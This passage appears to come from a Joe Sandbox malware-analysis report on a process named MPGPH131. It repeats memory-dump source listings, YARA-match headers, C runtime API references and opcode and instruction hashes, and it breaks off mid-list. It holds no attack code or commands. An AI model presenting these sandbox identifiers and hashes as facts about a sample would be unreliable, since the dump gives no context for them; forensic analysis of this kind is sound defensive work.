                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 06b63668285a2000df8359811aa3c1cd4c55ba09ae368722fa7c125cef877716
                                    • Instruction ID: c53c88bc559d5062c206cb5b8acf0d84a2112ef973188806a2ef3f27db15d5ad
                                    • Opcode Fuzzy Hash: 06b63668285a2000df8359811aa3c1cd4c55ba09ae368722fa7c125cef877716
                                    • Instruction Fuzzy Hash: E4F0E93260962D669F236B278C15BBB3B489F41760B1A8111EE449A1D4CB20EE0082E4
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,003DDD3B,?,?,?,?,?,00302D8D,003DADBC,?,?,003DADBC), ref: 003F4520
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 48bbdbba7a1362da4fdd152043ef7dda22bb3a28d4d0da1928596669ed205972
                                    • Instruction ID: f2b67d1a62386c44c578e7823dc5d8404d0a8f6049834e268de7125030f2c91f
                                    • Opcode Fuzzy Hash: 48bbdbba7a1362da4fdd152043ef7dda22bb3a28d4d0da1928596669ed205972
                                    • Instruction Fuzzy Hash: C3E09B3110162D57D6233A655C0177B3A8DDF833B1F160121EF4C9A1D1DB50DE0041E5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 92979d71bb11ca57e8eed4608918fcdd0df8007edfb7c2d8752b79d4bc3e648b
                                    • Instruction ID: a6246072a18dae6da5bcd760303db7d9957985d27e431a6b6d0cbd64ef12adb7
                                    • Opcode Fuzzy Hash: 92979d71bb11ca57e8eed4608918fcdd0df8007edfb7c2d8752b79d4bc3e648b
                                    • Instruction Fuzzy Hash: EB11D3EB20C220BEF24286916B545F72B6AEBD7730330556BB647DB283F2941E49B131
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3cbf5753aba7b83bc047c1a9ff16d7c6273a2515a117bdb07dec74acae5c91bd
                                    • Instruction ID: a1440a4c6e5e764cbb2679951c1bfa026fe0e9ea7972205f5021181704977bbe
                                    • Opcode Fuzzy Hash: 3cbf5753aba7b83bc047c1a9ff16d7c6273a2515a117bdb07dec74acae5c91bd
                                    • Instruction Fuzzy Hash: A91108E724C360BEE24281956B449F67BAAABE763033054ABF543CB243F5941E5DA132
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ff9c22538f5e4f69f313e86ecc95afc18d1d25c7f370627f3fe63087aacae7b0
                                    • Instruction ID: 4b925b1f90ee71187dfe2dc2354b7d5bc4695bc4cd3aad365575a20899b6bb6d
                                    • Opcode Fuzzy Hash: ff9c22538f5e4f69f313e86ecc95afc18d1d25c7f370627f3fe63087aacae7b0
                                    • Instruction Fuzzy Hash: F211ADEB24C230BDF14281956B54AF66BAAA7E7730330A567F607DB283F6941E487131
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 22e576e3728135e4afdddd416a1a38b00c3ed936787e16eb7b9c8322a098d661
                                    • Instruction ID: 5842613c2c92e34e1a8c6ebe714803e1c35537ccd1a4f07eb137bf3f619de848
                                    • Opcode Fuzzy Hash: 22e576e3728135e4afdddd416a1a38b00c3ed936787e16eb7b9c8322a098d661
                                    • Instruction Fuzzy Hash: E811E1EB24C230BDF10281816B54AF7675AA7E7730330A567F603D6283F2951E8D7031
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 125d3fab895d0dd8c8970d9d6f2cdfb7cddd93f464023d6985faea0eb0b0f2e7
                                    • Instruction ID: d159bd7ccb971e150894dbc015b2f1ce2b2ebbcc7fe3e0b79e44e202061131bd
                                    • Opcode Fuzzy Hash: 125d3fab895d0dd8c8970d9d6f2cdfb7cddd93f464023d6985faea0eb0b0f2e7
                                    • Instruction Fuzzy Hash: B601D1EB348224AEE10281816B14AF767A9A7E6730330A467F503C6183F1D41A8D6130
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: de50d601a686c1cd6095e0aebd4a1688d73051f6e1116b44b9db8628a6d79005
                                    • Instruction ID: 2e614aed656a2c9eaf597a708ab41611c22dffdded5e5c4775c98f8bb3d2a95f
                                    • Opcode Fuzzy Hash: de50d601a686c1cd6095e0aebd4a1688d73051f6e1116b44b9db8628a6d79005
                                    • Instruction Fuzzy Hash: 8901D6EB34C220ADF201818167546F66BA9E7D6670330A827F507C6283F5845E8D6030
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8fd4dd9873ce16ac57abf2c84fdb34d70bb7f66cc0bcdb6093fb03183b08af67
                                    • Instruction ID: 8568345126cc384ead5a4e9a28a03a50c262e80dd4fb2fd8d7e65d1a550b574d
                                    • Opcode Fuzzy Hash: 8fd4dd9873ce16ac57abf2c84fdb34d70bb7f66cc0bcdb6093fb03183b08af67
                                    • Instruction Fuzzy Hash: 4BF0A4AB34C230ADF242858177546F667AAA7D6730330A56BF607D6283F5841E8D7135
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dde33899d72c6fe8421726768a0d646a25fa1d599c1d03d44164d0280075ab85
                                    • Instruction ID: ff16c751b38d1c4f6c735ce63831267e3617c2886d27d6ef6a870aef1cf8bb45
                                    • Opcode Fuzzy Hash: dde33899d72c6fe8421726768a0d646a25fa1d599c1d03d44164d0280075ab85
                                    • Instruction Fuzzy Hash: B8F028EB24C1307DE24381902B946F62BE9E6D67313309867F502C6183F0994A4E6131
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2cb327f6309abd6440015245fbaad474a5fb7a469caf6dc7bdacfea7f465dae4
                                    • Instruction ID: 2c7aa361b5af77a62a9df0015f65f5fbc9a99167279f7111b25a3bc0103cc76c
                                    • Opcode Fuzzy Hash: 2cb327f6309abd6440015245fbaad474a5fb7a469caf6dc7bdacfea7f465dae4
                                    • Instruction Fuzzy Hash: ACF0247B24C2619ED20291A15B592FBBBA27AD363033480BFB00383183F186066EA231
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0036AB43
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0036AB65
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0036AB85
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0036ABAF
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0036AC1D
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0036AC69
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0036AC83
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0036AD18
                                    • std::_Facet_Register.LIBCPMT ref: 0036AD25
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                    • String ID: bad locale name
                                    • API String ID: 3375549084-1405518554
                                    • Opcode ID: 12b3f523608795b329e3739ccb8fa136d4f59c13fc9856968535082e6fd5af66
                                    • Instruction ID: 8ed83c4bf32e4a088e00ef6afd7357ab54a73a4cc0887222c61e80e59981a903
                                    • Opcode Fuzzy Hash: 12b3f523608795b329e3739ccb8fa136d4f59c13fc9856968535082e6fd5af66
                                    • Instruction Fuzzy Hash: A4616DB1D00654EBDF12DFA4E845B9EBBB4AF05350F158069E805BB385EB34E905CB92
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 003037E9
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00303835
                                    • __Getctype.LIBCPMT ref: 0030384E
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0030386A
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 003038FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                    • String ID: 0:0$bad locale name
                                    • API String ID: 1840309910-4031232150
                                    • Opcode ID: 3ed93b0c7dadf349c162b28d7d278cae72c48285407013bdaee82e33c4bca680
                                    • Instruction ID: 01eb59dafb34fb1ff82779f4316e4150010fd20131b441804df82b701eb642db
                                    • Opcode Fuzzy Hash: 3ed93b0c7dadf349c162b28d7d278cae72c48285407013bdaee82e33c4bca680
                                    • Instruction Fuzzy Hash: F35170B2D01358DBDB11DFA5D84579EFBB8AF14310F14816AE804AB381E775EA08CB92
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 003E0507
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 003E050F
                                    • _ValidateLocalCookies.LIBCMT ref: 003E0598
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 003E05C3
                                    • _ValidateLocalCookies.LIBCMT ref: 003E0618
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 5910cc291f1e387528c1d5666bc3310f1321a06470a928661a459e973e038450
                                    • Instruction ID: 10bd7e8b6b971bce6a7c6884c50d8b9da0b04311c2ac9e009dd9132f32610af8
                                    • Opcode Fuzzy Hash: 5910cc291f1e387528c1d5666bc3310f1321a06470a928661a459e973e038450
                                    • Instruction Fuzzy Hash: 4041F930A042689FCF15DF6AC880A9E7BB4EF45324F148265E814AB3D2D775EA45CF90
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00369263
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00369286
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 003692A6
                                    • std::_Facet_Register.LIBCPMT ref: 0036931B
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00369333
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0036934B
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: c657c4c8d75a3c9c12d4d6fdfd8ec5bb1c2df41150b0f73586544476ee4e7b88
                                    • Instruction ID: ce1bbed4086bdb84c1689671a2ab429c6f1faae71d7c491f2153452dd4c730c1
                                    • Opcode Fuzzy Hash: c657c4c8d75a3c9c12d4d6fdfd8ec5bb1c2df41150b0f73586544476ee4e7b88
                                    • Instruction Fuzzy Hash: 06419F72D00219EFCB12DF54E841BAABBB8FB45720F15866AE805AB395D730AD05CBD1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 003060F2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0030617F
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00306248
                                    Strings
                                    • recursive_directory_iterator::operator++, xrefs: 003061CC
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy$___std_exception_copy
                                    • String ID: recursive_directory_iterator::operator++
                                    • API String ID: 1206660477-953255998
                                    • Opcode ID: ec9d104150e99aa0e5696c67647cf6c673e6443fde7a55fdaf8a3d6edba02f18
                                    • Instruction ID: df072d40c7f1576c86225e5aaa5301835358dfd088cb5909c9d26423467974f5
                                    • Opcode Fuzzy Hash: ec9d104150e99aa0e5696c67647cf6c673e6443fde7a55fdaf8a3d6edba02f18
                                    • Instruction Fuzzy Hash: 1EE133B19106049FDB2ADF68D855BAEB7F9FF44300F10862EE44297781E774AA44CBA0
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 003086DE
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 003086ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: at line $, column
                                    • API String ID: 4194217158-191570568
                                    • Opcode ID: ddc185257668d7934acd1dd77c44026b70c6047ff250515d0f18260c1f723bbe
                                    • Instruction ID: b97806acc45bb8f9c38d3217fb3f8b91183af05f3695769a54b13205c33c74af
                                    • Opcode Fuzzy Hash: ddc185257668d7934acd1dd77c44026b70c6047ff250515d0f18260c1f723bbe
                                    • Instruction Fuzzy Hash: 1B618871E102089FDB0ACF68DC95B9EBBB5FF45310F148619E451AB7C2EB74AA80C794
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00374109
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00374122
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
